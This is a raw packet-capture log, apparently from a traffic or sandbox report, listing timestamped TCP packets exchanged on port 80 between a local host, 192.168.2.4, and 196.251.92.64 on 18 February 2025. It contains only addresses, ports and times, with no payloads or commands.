Feb 18, 2025 08:14:24.345422983 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.345449924 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345455885 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345710039 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.346187115 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.346194029 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.346205950 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.346282959 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.346293926 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.346412897 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.347067118 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.347433090 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.441428900 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.442543030 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.464917898 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.464945078 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.464951992 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465002060 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.465002060 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.465015888 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465023994 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465069056 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.465291977 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465337038 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465343952 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465373993 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.465409040 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.465468884 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465475082 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.465548038 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.466049910 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466057062 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466063976 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466115952 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.466140985 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466146946 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466162920 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.466185093 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.466315985 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.467005014 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.467011929 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.467024088 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.467068911 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.467107058 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.467238903 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.584546089 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584558010 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584573984 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584585905 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584745884 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584748030 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.584752083 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584764957 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584805012 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.584831953 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584839106 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584851027 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584877014 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.584969997 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.584976912 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585025072 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.585706949 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585715055 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585727930 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585766077 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.585844994 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585851908 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585865021 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585896969 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.585899115 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.585903883 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586050987 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.586685896 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586692095 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586708069 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586824894 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586831093 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.586858988 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.587107897 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.711575031 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711585045 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711703062 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711715937 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711728096 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711734056 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711761951 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711767912 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.711772919 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.711772919 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.711795092 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.711807966 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712069988 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712075949 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712086916 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712117910 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712156057 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712258101 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712264061 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712270975 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712306023 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712356091 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712510109 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712517023 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712523937 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712559938 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712685108 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712691069 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712853909 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.712872028 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712877989 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712889910 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.712924957 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.713047028 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713052988 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713184118 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.713219881 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713227034 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713238955 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713248014 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713275909 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.713300943 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.713815928 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713820934 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713835955 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713869095 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.713989973 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.713995934 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.714008093 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.714015007 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.714070082 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.714070082 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.714111090 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.714196920 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831108093 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831120968 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831134081 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831139088 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831146002 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831152916 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831204891 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831211090 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831331015 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831398964 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831542015 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831547976 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831559896 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831603050 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831712008 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831717968 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831729889 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831734896 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831741095 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831748009 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831760883 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831768990 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831897974 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831904888 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.831923962 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.831962109 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.832412958 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.832575083 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832581043 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832592964 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832602978 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.832628965 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.837946892 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838026047 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838089943 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838095903 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838105917 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838114023 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838120937 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838152885 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838268042 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838274002 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838285923 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838294029 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838325977 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838457108 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838463068 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838474989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838483095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838514090 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838537931 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838598967 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838676929 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838958979 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838965893 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838977098 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839020967 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.839117050 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839123011 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839133978 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839139938 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839145899 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839164019 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.839306116 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.923405886 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.923547029 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951220036 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951229095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951241016 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951246977 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951255083 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951344967 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951358080 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951370001 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951374054 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951380014 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951385975 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951390982 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951400042 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951405048 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951406002 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951406002 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951411963 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951420069 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951432943 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951453924 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951498985 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951507092 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951524019 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951653957 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951659918 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951672077 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951678991 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951680899 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951703072 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951730013 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951819897 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951827049 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951955080 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952153921 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952301979 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952307940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952320099 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952325106 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952327967 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952331066 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952337027 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952348948 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952384949 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952500105 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952507019 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952517033 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952522993 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952553034 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952579021 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.964726925 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964809895 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.964884043 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964912891 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964919090 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965018988 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965018988 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965054989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965060949 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965071917 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965106010 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965218067 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965224028 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965234995 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965240002 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965246916 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965265036 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965286970 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965404987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965410948 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965423107 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965547085 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965579987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965729952 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965735912 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965747118 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965751886 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965754032 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965759039 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965770960 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965779066 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965805054 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965908051 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965914011 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965920925 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965930939 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965949059 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965981007 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.070585966 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070595026 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070607901 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070699930 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070703030 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.070707083 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070718050 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070871115 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.070871115 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.070874929 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070889950 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070899963 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070907116 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070913076 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070919991 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.070930958 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.070960999 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071048021 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071054935 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071065903 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071228981 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071400881 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071526051 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071563959 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071571112 CET8049731196.251.92.64192.168.2.4
